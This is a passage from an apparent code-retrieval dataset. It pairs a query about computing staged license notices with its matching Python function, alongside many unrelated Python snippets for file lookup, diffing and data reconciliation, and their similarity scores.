fileId=%s\"%locId\n\t res = self.fetchOne(query)\n locFileName = res[0]\n\t # locInfo=[streamNames,pdsIDList,oDict,recordSize,positionOfFirstRecord]\n\t locInfo = lpds_dump.locationFileParser(locFileName)\n for pdsId in locInfo[1]:\n\t query = \"SELECT fileName FROM FileID WHERE fileId=%s\"%pdsId\n\t\tresult= self.fetchOne(query)\n print result[0]", "def file_location(self) -> str:\n if os.path.exists(self._file_path):\n return \"The file ({}) is located in the path ({})\".format(self._file_name, self._file_path)\n else:\n raise FileNotFoundError", "def _find_histfile_var(file_list, default=None):\n for f in file_list:\n f = expanduser_abs_path(f)\n if not os.path.isfile(f):\n continue\n with open(f, 'r') as rc_file:\n for line in rc_file:\n if line.startswith('HISTFILE='):\n hist_file = line.split('=', 1)[1].strip('\\'\"\\n')\n hist_file = expanduser_abs_path(hist_file)\n if 
os.path.isfile(hist_file):\n return hist_file\n else:\n if default:\n default = expanduser_abs_path(default)\n if os.path.isfile(default):\n return default", "async def get_or_fetch_local_tails_path(self):\n tails_file_path = self.get_receiving_tails_local_path()\n if Path(tails_file_path).is_file():\n return tails_file_path\n return await self.retrieve_tails()", "def _file_in_subdir(self, subdir, filename, check_exists=False):\n filepath = join(self.dir, subdir, filename)\n\n if check_exists and not isfile(filepath) and not isdir(filepath):\n\n # Try the filename as a pattern or regex before failing:\n matches = self._files_in_subdir(subdir,\n pattern='**/*{}*'.format(filename),\n regex=None)\n\n # Don't accept ambiguous patterns!\n if len(matches) == 1:\n return matches[0]\n\n raise FileNotFoundError(filepath)\n\n return filepath", "def stat (self, path):\r\n pass", "def isFile(self,fin,path=None,extention=None,head=\"check file exist\",exit_on_error=False,logmsg=False):\n \n fck = \"\"\n try:\n if path.strip(): fck = path + \"/\"\n except:\n pass\n \n if fin:\n fck += fin\n if extention:\n fck += extention\n f = os.path.abspath(self.expandvars(fck))\n # f = os.path.abspath(os.path.expandvars(os.path.expanduser(fin)))\n if os.path.isfile(f):\n if logmsg:\n logger.info(head + \"\\n --> file exist: {}\\n -> abs file{:>18} {}\".format(fck,':',f))\n return f\n #--- error no such file\n logger.error(head + \"\\n --> no such file or directory: {}\\n -> abs file{:>18} {}\".format(fck,':',f))\n if exit_on_error:\n raise SystemError(\"File not exists: {}\".format(f) )\n return False", "def _get_path_or_dummy(self, fuse_path):\n cache_path = self.converter.to_cache_path(fuse_path)\n dummy_cache_path = self.converter.add_dummy_ending(cache_path)\n if os.path.exists(cache_path):\n return cache_path\n elif os.path.exists(dummy_cache_path):\n return dummy_cache_path\n return None", "def read_symbolic_ref(self, path: str) -> Optional[Tuple[str, str]]:\n path = posixpath.join(self._path, path)\n self._trace(\"fetching symbolic ref: %s\" % path)\n try:\n meta, resp = self._connection.files_download(path)\n ref = resp.content.decode(\"utf8\")\n ref = ref[len(\"ref: \") :].rstrip()\n rev = meta.rev\n return (rev, ref)\n except dropbox.exceptions.ApiError as e:\n if not isinstance(e.error, dropbox.files.DownloadError):\n raise\n return None", "def identify_file(self, file):", "def result_file(file_path: str) -> Union[str, None]:\n if not os.path.isdir(file_path):\n return None\n else:\n file_list = list()\n for file in os.listdir(file_path):\n file_list.append(file)\n if not file_list or len(file_list) > 1:\n # it should be just one file per file_id directory\n return None\n else:\n return file_list[0]", "def find_file_by_binary(**kwargs):\n return AppServer.service.find_file_by_binary(binary=kwargs['binary'])", "def storage_get_report_file(self, report_pk):\n return self._get_queryset(pk=report_pk).get()", "def find_file(research_structure, raise_on_all_missing=True):\n filenames = []\n paths_searched = []\n ## config file lookup resolution\n for enforce_file_existence, fun in research_structure:\n candidate = fun()\n if candidate is None:\n continue\n if not os.path.exists(candidate):\n if enforce_file_existence:\n raise ValueError(\"File %r does not exists.\" % candidate)\n else:\n paths_searched.append(candidate)\n else:\n return candidate\n if not filenames and raise_on_all_missing:\n raise ValueError(\"No config file was found in those paths: %s.\"\n % ', '.join(paths_searched))\n return", "def 
valid_file(self, path_to_torrent):\n \n if file and os.path.isfile(path_to_torrent):\n return path_to_torrent\n else:\n return None", "def _mpd_lookup_track(track):\n \n args = [\"artist\", track[\"artist\"].encode(\"utf-8\"), \"title\", track[\"title\"].encode(\"utf-8\")]\n hits = []\n \n for match in _mpd_client.find(*args) + _mpd_client.search(*args):\n hits.append(match[\"file\"])\n \n return hits", "def _find_ref_fname(fname, ref_fname):\n curr_dir = \"\"\n next_dir = os.path.dirname(os.path.abspath(fname))\n while next_dir != curr_dir:\n curr_dir = next_dir\n rcfile = os.path.join(curr_dir, ref_fname)\n if os.path.exists(rcfile):\n return rcfile\n next_dir = os.path.dirname(curr_dir)\n return \"\"", "def _get_source_path(self, docmeta: DocMetadata) -> Optional[str]:\n identifier = docmeta.arxiv_identifier\n version = docmeta.version\n file_noex = identifier.filename\n if not docmeta.is_latest:\n parent_path = self._get_parent_path(identifier, version)\n file_noex = f'{file_noex}v{version}'\n else:\n parent_path = self._get_parent_path(identifier)\n\n for extension in VALID_SOURCE_EXTENSIONS:\n possible_path = os.path.join(\n parent_path,\n f'{file_noex}{extension[0]}')\n if os.path.isfile(possible_path):\n return possible_path\n return None", "def file_hl_group(self, file, stat_res=None, stat_error=None):\n if stat_error is not None:\n return 'Error'\n if stat_res is None:\n return self.file_hl_group(file, *stat_path(file))\n mode = stat_res.st_mode\n if not S_ISREG(mode): # Not a regular file\n if S_ISLNK(mode):\n if self._colors_special.get('ln') == 'target':\n # TODO\n # resolved = file.resolve()\n # if resolved == file:\n # # Don't try to resolve another time\n # # TODO\n # raise Exception('recursion! %s' % resolved)\n return self.file_hl_group(file,\n *stat_path(file, lstat=False))\n else:\n ansi_color = self._colors_special.get('ln')\n elif S_ISCHR(mode):\n ansi_color = self._colors_special.get('cd')\n elif S_ISDIR(mode):\n ansi_color = self._colors_special.get('di')\n elif S_ISFIFO(mode):\n ansi_color = self._colors_special.get('pi')\n elif S_ISBLK(mode):\n ansi_color = self._colors_special.get('bd')\n elif S_ISSOCK(mode):\n ansi_color = self._colors_special.get('so')\n else:\n # TODO Does this happen?\n return 'Error'\n elif mode & S_IXUSR: # Executable\n ansi_color = self._colors_special.get('ex')\n else: # Regular file\n needle = file.name.lower()\n for pattern, colorcode in self._colors.items():\n if needle.endswith(pattern):\n ansi_color = colorcode\n break\n else:\n # TODO Could not find a target color\n return None\n if ansi_color is None:\n return None\n hl_group = 'color' + ansi_color.replace(';', '_')\n return hl_group", "def _fetch_pathinfo(portal, storage, path):\n\n try:\n pinfo = storage.pathinfo(path)\n except PathNotFoundError:\n raise StorageArchiveError(path)\n\n if pinfo.get('external'):\n parsed = urlparse(pinfo['external']['location'])\n rev = pinfo['external']['rev']\n ob = portal.restrictedTraverse(parsed.path[1:])\n storage = queryAdapter(ob, IStorage)\n if storage:\n storage.checkout(rev)\n return _fetch_pathinfo(portal, storage, pinfo['external']['path'])\n\n if pinfo['mimetype']():\n return path, storage.file(path)\n\n # can't find anything\n raise StorageArchiveError(path)", "def get_specfile_path_from_repo(project: GitProject, ref: str = None) -> Optional[str]:\n spec_files = project.get_files(ref=ref, filter_regex=r\".+\\.spec$\")\n\n if not spec_files:\n logger.debug(f\"No spec file found in {project.full_repo_name!r}\")\n return None\n return 
spec_files[0]", "def spdx_file(self) -> Optional[pulumi.Input['FileNoteArgs']]:\n return pulumi.get(self, \"spdx_file\")", "def get_absolute_path(self):\n if self.datafile and self.datafile.storage.exists(self.datafile.path):\n return self.datafile.path\n else:\n return None", "def FindBinary( binary, user_options ):\n\n def _FindPath():\n key = '{0}_binary_path'.format( binary )\n if user_options.get( key ):\n return user_options[ key ]\n return GO_BINARIES.get( binary )\n\n binary_path = _FindPath()\n if os.path.isfile( binary_path ):\n return binary_path\n return None", "def get_file(self, remote_path, local_path, storage_id=None):\n return self.get(remote_path, local_path, directory=False, storage_id=storage_id)", "def retrieve(self, file_name):\n ret = os.path.join(self.path, file_name)\n temp = (self.path + file_name).find(self.path, 1, -1)\n if os.path.exists(ret):\n return os.path.join(self.path, file_name)\n elif temp != -1:\n if os.name == \"posix\":\n return os.getcwd() + '/' + file_name\n else:\n return os.getcwd() + '\\\\' + file_name\n else:\n return None", "def stats(self, file, **options):\n\n options['file'] = file\n\n return self._get('stats', **options)", "def get_file(view: sublime.View, string: str, name: str) -> 'Tuple[str, Optional[str]]':\n\n # if it's an absolute path get it\n if osp.isabs(string):\n return string, None\n\n # if search_mode: \"project\", search only in project\n elif Settings.search_mode == \"project\":\n # Get base project folders\n base_folders = sublime.active_window().folders()\n # if \"recursive\": true, recursively search for the name\n if Settings.recursive:\n ch_rec = check_recursive(base_folders, name)\n if ch_rec:\n base_folder, root = ch_rec\n return osp.join(root, name), base_folder\n return \"\", None\n else:\n # search only in base folders for the relative path\n for base_folder in base_folders:\n file_name = osp.normpath(osp.join(base_folder, string))\n if osp.exists(file_name):\n return file_name, base_folder\n return \"\", None\n # if search_mode: \"file\" join the relative path to the file path\n else:\n return osp.normpath(osp.join(osp.dirname(view.file_name()), string)), None", "def get_tracking_uri():\n global _tracking_uri\n if _tracking_uri is not None:\n return _tracking_uri\n elif env.get_env(_TRACKING_URI_ENV_VAR) is not None:\n return env.get_env(_TRACKING_URI_ENV_VAR)\n else:\n return os.path.abspath(\"./mlruns\")", "def fetch_library_file_path(file_name: str):\n file_path = os.path.join(library_dir, file_name)\n\n if os.path.exists(file_path) == False:\n add_library_file(file_name)\n\n return file_path", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def FindFile(self, fd):\n hashes = self._HashFile(fd)\n if 
not hashes:\n return False\n\n hash_urn = self.PATH.Add(str(hashes.sha1))\n\n for data in aff4.FACTORY.Stat([hash_urn], token=self.token):\n return data[\"urn\"]\n\n return False", "def _guess_log_path(hint: Union[str, pathlib.Path]=None) -> pathlib.Path:\n path = pathlib.Path(hint) if hint else None\n home = os.environ.get('HOME', os.environ.get('USERPROFILE'))\n\n if path and path.exists():\n if path.is_file():\n return path\n elif not path.is_dir():\n return None\n elif home:\n path = pathlib.Path(home) / 'Documents'\n else:\n return None\n\n results = list(path.glob('PwrData*.csv'))\n\n if results:\n return sorted(results)[-1]" ]
[ "0.54929686", "0.5405405", "0.5390188", "0.538945", "0.52806234", "0.52451473", "0.524215", "0.5137974", "0.5047577", "0.502459", "0.50199705", "0.49906838", "0.4970432", "0.49497023", "0.4910103", "0.4907254", "0.48910886", "0.48726743", "0.48697725", "0.4835479", "0.48274845", "0.48164198", "0.4797407", "0.4785708", "0.47653246", "0.47639638", "0.47590125", "0.47358558", "0.47353184", "0.47322643", "0.4729406", "0.47277647", "0.47207966", "0.47207966", "0.46901944", "0.46830073", "0.46741968", "0.4656383", "0.46545762", "0.46474802", "0.46446073", "0.46436766", "0.46376404", "0.46250677", "0.46218884", "0.46215776", "0.46132746", "0.46119773", "0.46105984", "0.46036965", "0.45975855", "0.45880875", "0.45880875", "0.45880875", "0.45831123", "0.45707238", "0.45664722", "0.4551773", "0.455032", "0.45480716", "0.45236108", "0.45219412", "0.45008376", "0.4492937", "0.44927287", "0.4491548", "0.44832098", "0.44752914", "0.44707897", "0.446161", "0.445814", "0.44480854", "0.44448483", "0.4443911", "0.44410315", "0.4433302", "0.44315612", "0.4425981", "0.4424705", "0.44241259", "0.44198808", "0.4398443", "0.4397191", "0.43893695", "0.4369303", "0.43597493", "0.43552536", "0.4345248", "0.43419358", "0.43385822", "0.43381622", "0.4334609", "0.43336794", "0.43321478", "0.43319124", "0.43282804", "0.4326255", "0.43208495", "0.431723", "0.43136153" ]
0.718714
0
Compute the notices object as if the two paths were properly staged. analyze_diffs needs to be independent of staging. Staging might not have been run, or might be out of date from when analyze_diffs is run. So we make a best attempt to reconstruct the notices that would have occurred post-staging.
def _compute_staged_notices(mods_path, third_party_path): mods_notices = notices.Notices() if mods_path: mods_notices.add_sources([mods_path]) third_party_notices = notices.Notices() if third_party_path: third_party_notices.add_sources([third_party_path]) # If there are mods and third_party notices, pick the one that is more # specific to the file, which is the one that has a deeper path. if (_count_directory_levels_in_license_root(third_party_notices) > _count_directory_levels_in_license_root(mods_notices)): return third_party_notices else: return mods_notices
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_diffs(history):\n\n # First get all possible representations\n mgr = plugins_get_mgr() \n keys = mgr.search('representation')['representation']\n representations = [mgr.get_by_key('representation', k) for k in keys]\n\n for i in range(len(history)):\n if i+1 > len(history) - 1:\n continue\n\n prev = history[i]\n curr = history[i+1]\n\n #print(prev['subject'], \"==>\", curr['subject'])\n #print(curr['changes'])\n for c in curr['changes']:\n \n path = c['path']\n\n # Skip the metadata file\n if c['path'].endswith('datapackage.json'): \n continue \n\n # Find a handler for this kind of file...\n handler = None \n for r in representations: \n if r.can_process(path): \n handler = r \n break \n \n if handler is None: \n continue \n\n # print(path, \"being handled by\", handler)\n\n v1_hex = prev['commit']\n v2_hex = curr['commit']\n\n temp1 = tempfile.mkdtemp(prefix=\"dgit-diff-\") \n \n try: \n for h in [v1_hex, v2_hex]: \n filename = '{}/{}/checkout.tar'.format(temp1, h)\n try:\n os.makedirs(os.path.dirname(filename))\n except:\n pass \n extractcmd = ['git', 'archive', '-o', filename, h, path]\n output = run(extractcmd)\n if 'fatal' in output: \n raise Exception(\"File not present in commit\") \n with cd(os.path.dirname(filename)): \n cmd = ['tar', 'xvf', 'checkout.tar']\n output = run(cmd) \n if 'fatal' in output: \n print(\"Cleaning up - fatal 1\", temp1)\n shutil.rmtree(temp1)\n continue \n\n # Check to make sure that \n path1 = os.path.join(temp1, v1_hex, path) \n path2 = os.path.join(temp1, v2_hex, path) \n if not os.path.exists(path1) or not os.path.exists(path2): \n # print(\"One of the two output files is missing\") \n shutil.rmtree(temp1)\n continue \n\n #print(path1, path2) \n\n # Now call the handler\n diff = handler.get_diff(path1, path2)\n\n # print(\"Inserting diff\", diff)\n c['diff'] = diff\n\n except Exception as e: \n #traceback.print_exc() \n #print(\"Cleaning up - Exception \", temp1)\n shutil.rmtree(temp1)", "def apply_decisions(base, decisions):\n\n merged = copy.deepcopy(base)\n prev_path = None\n parent = None\n last_key = None\n resolved = None\n diffs = None\n # clear_parent actions should override other decisions on same obj, so\n # we need to track it\n clear_parent_flag = False\n for md in decisions:\n path, line = split_string_path(merged, md.common_path)\n # We patch all decisions with the same path in one op\n if path == prev_path:\n # Same path as previous, collect entry\n if clear_parent_flag:\n # Another entry will clear the parent, all other decisions\n # should be dropped\n pass\n else:\n if md.action == \"clear_parent\":\n clear_parent_flag = True\n # Clear any exisiting decsions!\n diffs = []\n ad = resolve_action(resolved, md)\n if line:\n ad = push_path(line, ad)\n diffs.extend(ad)\n\n else:\n # Different path, start a new collection\n if prev_path is not None:\n # First, apply previous diffs\n if parent is None:\n # Operations on root create new merged object\n merged = patch(resolved, diffs)\n else:\n # If not, overwrite entry in parent (which is an entry in\n # merged). 
This is ok, as no paths should point to\n # subobjects of the patched object\n parent[last_key] = patch(resolved, diffs)\n\n prev_path = path\n # Resolve path in base and output\n resolved = merged\n parent = None\n last_key = None\n for key in path:\n parent = resolved\n resolved = resolved[key] # Should raise if key missing\n last_key = key\n diffs = resolve_action(resolved, md)\n if line:\n diffs = push_path(line, diffs)\n clear_parent_flag = md.action == \"clear_parent\"\n # Apply the last collection of diffs, if present (same as above)\n if prev_path is not None:\n if parent is None:\n merged = patch(resolved, diffs)\n else:\n parent[last_key] = patch(resolved, diffs)\n\n merged = nbformat.from_dict(merged)\n return merged", "def compute_audit(self):\r\n \r\n time = datetime.now()\r\n H0_dist = []\r\n Ha_dist = []\r\n\r\n for i in range(0, self.m):\r\n #print(\"CURRENT H0 dist: \", H0_dist)\r\n #try:\r\n H0_dist = self.next_round_dist(True, H0_dist, i)\r\n Ha_dist = self.next_round_dist(False, Ha_dist, i)\r\n '''\r\n except Exception as e:\r\n \r\n print(e)\r\n self.bad = H0_dist\r\n self.bad2 = Ha_dist\r\n return\r\n '''\r\n self.decide_k_min(H0_dist, Ha_dist, i)\r\n #print('ROUND INDEX: ',i,'kminschedl: ',self.k_min_sched[i])\r\n\r\n #self.truncate_dist(H0_dist, i)\r\n H0_dist = H0_dist[:self.k_min_sched[i]]\r\n #self.truncate_dist(Ha_dist, i)\r\n Ha_dist = Ha_dist[:self.k_min_sched[i]]\r\n \r\n #print(\"The outputs: k_mins, LR denominator, LR numerator, 1 / LR (or alpha').\")\r\n #print(self.k_min_sched, '\\n', self.pr_H0_sched, '\\n', self.pr_Ha_sched, '\\n', \r\n #self.risk_sched)\r\n #print(\"Output suppressed. Use instance variables k_min_sched, pr_H0_sched, pr_Ha_sched, risk_sched\")\r\n\r\n #print(\"Time elapsed:\", datetime.now() - time)\r", "def diff_report(self) -> str:\n graph_a = self.graph_a\n graph_b = self.graph_b\n\n graph_a_str = str(graph_a)\n graph_b_str = str(graph_b)\n\n if graph_a_str == graph_b_str:\n return \"\"\n\n graph_diff = difflib.ndiff(\n graph_a_str.splitlines(True), graph_b_str.splitlines(True)\n )\n graph_diff_report = [\"Graph diff:\", self._indent(\"\".join(graph_diff))]\n\n for node_a, node_b in itertools.zip_longest(graph_a.nodes(), graph_b.nodes()):\n if str(node_a) != str(node_b):\n graph_diff_report.append(\"First diverging operator:\")\n node_diff = difflib.ndiff(\n str(node_a).splitlines(True), str(node_b).splitlines(True)\n )\n source_printout = [\"node diff:\", self._indent(\"\".join(node_diff))]\n\n stack_a = node_a.sourceRange() if node_a else None\n if stack_a:\n source_printout.extend(\n [\"Former source location:\", self._indent(str(stack_a))]\n )\n stack_b = node_b.sourceRange() if node_b else None\n if stack_b:\n source_printout.extend(\n [\"Latter source location:\", self._indent(str(stack_b))]\n )\n\n graph_diff_report.extend(source_printout)\n\n break\n\n return \"\\n\".join(graph_diff_report)", "def compare_readbacks(golden_path,\n readback_path):\n\n errors_cram = 0\n seu_01 = 0\n seu_10 = 0\n mbu_pos = 0\n mbu_neg = 0\n mbu_delta = []\n\n golden = open(golden_path, \"rb\")\n readback = open(readback_path, \"rb\")\n\n golden_array = golden.read()\n readback_array = readback.read()\n print(len(golden_array))\n print(len(readback_array))\n\n for i in range(0, len(golden_array)):\n if golden_array[i] != readback_array[i]:\n gold_byte, = struct.unpack(\"B\", golden_array[i])\n gold_byte_ones = bin(gold_byte).count(\"1\")\n readback_byte, = struct.unpack(\"B\", readback_array[i])\n readback_byte_ones = 
bin(readback_byte).count(\"1\")\n\n delta = gold_byte_ones - readback_byte_ones\n\n if delta == -1:\n seu_01 += 1\n elif delta == 1:\n seu_10 += 1\n elif delta > 1:\n mbu_pos += 1\n mbu_delta.append(delta)\n print(\"\\n\\n\\n\\n\\n DUPA \\n\\n\\n\\n\\n\")\n elif delta < -1:\n mbu_neg += 1\n mbu_delta.append(delta)\n print(\"\\n\\n\\n\\n\\n DUPA \\n\\n\\n\\n\\n\")\n\n print(gold_byte,\n readback_byte,\n delta)\n\n errors_cram += 1\n\n print(\"\\n\\nseu_01: {0}\\nseu_10: {1}\\nmbu_01: {2}\\nmbu_10: {3}\".format(seu_01, seu_10, mbu_neg, mbu_pos))\n print(mbu_delta)\n golden.close()\n readback.close()\n\n return errors_cram", "def PostProcessDiff(self, diff):\r\n return diff", "def analyze_data():\n attack_free_1 = load_messages(\"data/csv/Attack_free_dataset.csv\", verbose=True)\n\n impersonation_1 = load_messages(\"data/csv/170907_impersonation.csv\", verbose=True)\n impersonation_2 = load_messages(\"data/csv/170907_impersonation_2.csv\", verbose=True)\n impersonation_3 = load_messages(\"data/csv/Impersonation_attack_dataset.csv\", verbose=True)\n\n information = {\n \"Mean time between normal messages\":\n get_mean_time_between_normal_messages(attack_free_1),\n \"Mean time between split messages\":\n get_mean_time_between_split_messages(attack_free_1),\n \"Sum of removed intervals in '170907_impersonation.csv'\":\n get_sum_of_removed_intervals(impersonation_1, 250),\n \"Sum of removed intervals in '170907_impersonation_2.csv'\":\n get_sum_of_removed_intervals(impersonation_2, 250),\n \"Sum of removed intervals in 'Impersonation_attack_dataset.csv'\":\n get_sum_of_removed_intervals(impersonation_3, 250),\n \"Index of split in '170907_impersonation.csv'\":\n get_index_before_time(impersonation_1, 250 - 23.434627056121826),\n \"Index of split in '170907_impersonation_2.csv'\":\n get_index_before_time(impersonation_2, 250 - 20.980855226516724),\n \"Index of split in 'Impersonation_attack_dataset.csv'\":\n get_index_before_time(impersonation_3, 250 - 2.1056361198425293)\n }\n\n return information", "def compare_old_and_new_status_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n recipedirs=dirutil.immediate_subdirs(os.path.join(mastcontrol,\"statusfiles\"))\n for recipedir in recipedirs:\n mystatus=\"unknown\"\n rdict[recipedir]=dict()\n changelist=list()\n if not os.path.exists(os.path.join(mastscratch,recipedir)):\n mystatus=\"archived\"\n else:\n scratchstatusfile = MASTFile(os.path.join(mastscratch,recipedir,\"status.txt\"))\n controlstatusfile = MASTFile(os.path.join(mastcontrol,\"statusfiles\",recipedir,\"status.txt\"))\n if scratchstatusfile.data == controlstatusfile.data:\n mystatus=\"unchanged\"\n else:\n mystatus=\"changed\"\n myidx=0\n while myidx < len(scratchstatusfile.data):\n oldline = controlstatusfile.data[myidx]\n newline = scratchstatusfile.data[myidx]\n if \"#\" in oldline:\n pass\n else:\n ingred = oldline.split(\":\")[0].strip()\n oldstatus = oldline.split(\":\")[1].strip()\n newstatus = newline.split(\":\")[1].strip()\n if (oldstatus == \"P\") and (newstatus == \"P\"):\n rdict[recipedir][ingred]=\"AVOID\"\n elif (oldstatus == \"C\") and (newstatus == \"C\"):\n rdict[recipedir][ingred]=\"AVOID\"\n else:\n rdict[recipedir][ingred]=\"send\"\n myidx = myidx + 1\n rdict[recipedir][\"MAIN\"]=mystatus\n return rdict", "def _get_diff_data(views_index, src_data, ea_index, ddi_data):\n\n def _add_and_del():\n \"\"\"Handles the add's and del import's.\"\"\"\n for add_or_del_row in src_data:\n # Add Check.\n if 'add' 
in add_or_del_row[0]:\n if add_or_del_row[1] in \\\n ddi_data[views_index[add_or_del_row[15]]]:\n errored_list.append(add_or_del_row)\n continue\n else:\n import_add.append(add_or_del_row)\n continue\n\n # delete check\n if 'del' in add_or_del_row[0] and add_or_del_row[1] in \\\n ddi_data[views_index[add_or_del_row[15]]][\n add_or_del_row[1]]:\n import_delete.append([add_or_del_row[15],\n add_or_del_row[1],\n add_or_del_row[14]])\n continue\n unused_list.append(add_or_del_row)\n\n def _ea_in_disposition_col0_and_empty_ipr_d_col():\n \"\"\"Disposition col0 check and an empty ipr disposition column.\"\"\"\n for disposition_row in unused_list:\n # Check disposition\n ddi_index = views_index[disposition_row[15]]\n # Checks disposition column value and checks for IPR D value.\n # If no IPR D in extattrs dict stores the src data for updates.\n if disposition_row[0] in ea_ipr_d_values and 'IPR Designation' not\\\n in ddi_data[ddi_index][disposition_row[1]]['extattrs']:\n import_merge_disposition.append(\n [disposition_row[15],\n disposition_row[1],\n disposition_row[14],\n disposition_row[0]])\n\n def _comment_check():\n \"\"\"Function for checking ipam comment attribute.\"\"\"\n for comment_row in unused_list:\n ddi_index = views_index[comment_row[15]]\n # Checks for empty src value and empty ddi data value.\n # Continues if True.\n if 'comment' not in ddi_data[ddi_index][comment_row[1]]\\\n and comment_row[12] == '':\n continue\n # Checks a non-empty src value and updates if an\n # empty ddi data value.\n if 'comment' not in ddi_data[ddi_index][comment_row[1]] and \\\n comment_row[12] != '':\n import_merge.append([comment_row[15],\n comment_row[1],\n comment_row[14],\n {'comment': comment_row[12]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if comment_row[12] != \\\n ddi_data[ddi_index][comment_row[1]]['comment']:\n import_override.append([comment_row[15],\n comment_row[1],\n comment_row[14],\n {'comment': comment_row[12]}])\n continue\n\n def _non_listed_ea_columns_check():\n \"\"\"Checks non-listable ea columns.\"\"\"\n for ea_row in unused_list:\n # dup Check in disposition\n ddi_index = views_index[ea_row[15]]\n for key, value in ea_index.items():\n # ea attributes that could be listed.\n if key == 'Datacenter' or key == 'IPR Designation':\n continue\n # Checks for empty src value and empty ddi data value.\n # Continues if True.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Checks a non-empty src value and updates if an\n # empty ddi data value.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n\n def _listed_ea_column_check():\n \"\"\"Checks non-listable ea columns.\"\"\"\n for ea_row in unused_list:\n ddi_index = views_index[ea_row[15]]\n # This check is performed in\n # _ea_in_disposition_col0_and_empty_ipr_d_col\n if ea_row[0] in ea_ipr_d_values and \\\n 'IPR Designation' not in \\\n ddi_data[ddi_index][ea_row[1]]['extattrs']:\n continue\n # Update IPR D src column with ea_row[0] for processing.\n # WORK IN 
PROGRESS\n elif ea_row[0] in ea_ipr_d_values and 'IPR Designation' \\\n in ddi_data[ddi_index][ea_row[1]]['extattrs']:\n pass\n # Processing listable columns.\n for key, value in ea_index.items():\n # Skip's unused keys.\n if key not in ['Datacenter', 'IPR Designation']:\n continue\n # Check for blank column and blank source column.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n if key == 'IPR Designation':\n if ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] in ea_ipr_d_values:\n ea_row[16] = ea_row[16] + ',' + ea_row[0]\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[16]}])\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n elif ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] not in ea_ipr_d_values:\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[0]}])\n continue\n# # Check Disposition col. and if IPR D listed value needs\n# # updating. On listed IPR D values.\n# if ea_row[0].lower().strip() in ea_ipr_d_values \\\n# and ',' in ea_row[16]:\n# temp_list = ea_row[16].split(',')\n# temp_list = [x.strip() for x in temp_list]\n# if ea_row[0].lower().strip() in temp_list:\n# continue\n# else:\n# temp_list.append(ea_row[0].lower().strip())\n# temp_dict_override.update({key: temp_list})\n# import_override.append([ea_row[15].strip(),\n# ea_row[1].strip(),\n# ea_row[14].strip(),\n# temp_dict_override])\n# continue\n\n # Builds dataset for non-listed values. 
Final Step.\n # If key not in ddi data and src value is not none.\n # Assign to merge.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue\n\n # Local scope variables.\n import_add = []\n import_delete = []\n import_merge = []\n import_override = []\n import_merge_disposition = []\n unused_list = []\n errored_list = []\n # Check for extensible attribute in Disposition column[0].\n # If found and IPR D column is empty append for writing.\n ea_ipr_d_values = ['leaf', 'dup', 'followup', 'decom', 'adv', 'divest',\n 'ignore', 're-ip', 'parent', 'drop reserve']\n _add_and_del()\n _ea_in_disposition_col0_and_empty_ipr_d_col()\n _comment_check()\n _non_listed_ea_columns_check()\n _listed_ea_column_check()\n return import_add, \\\n import_delete, \\\n import_merge_disposition, \\\n import_merge, \\\n import_override", "def analyze_state_changes(self):\n graph = self._graph\n lost_chunks = set(self._lost_chunks)\n op_states = self._op_states\n\n # mark lost virtual nodes as lost when some preds are lost\n for n in graph:\n if not isinstance(n.op, VirtualOperand) \\\n or op_states.get(n.op.key) == OperandState.UNSCHEDULED:\n continue\n if any(pred.key in lost_chunks for pred in graph.iter_predecessors(n)):\n lost_chunks.add(n.key)\n\n # collect operands with lost data\n op_key_to_chunks = defaultdict(list)\n lost_ops = set()\n for n in graph:\n op_key_to_chunks[n.op.key].append(n)\n if n.key in lost_chunks:\n lost_ops.add(n.op.key)\n\n # check data on finished 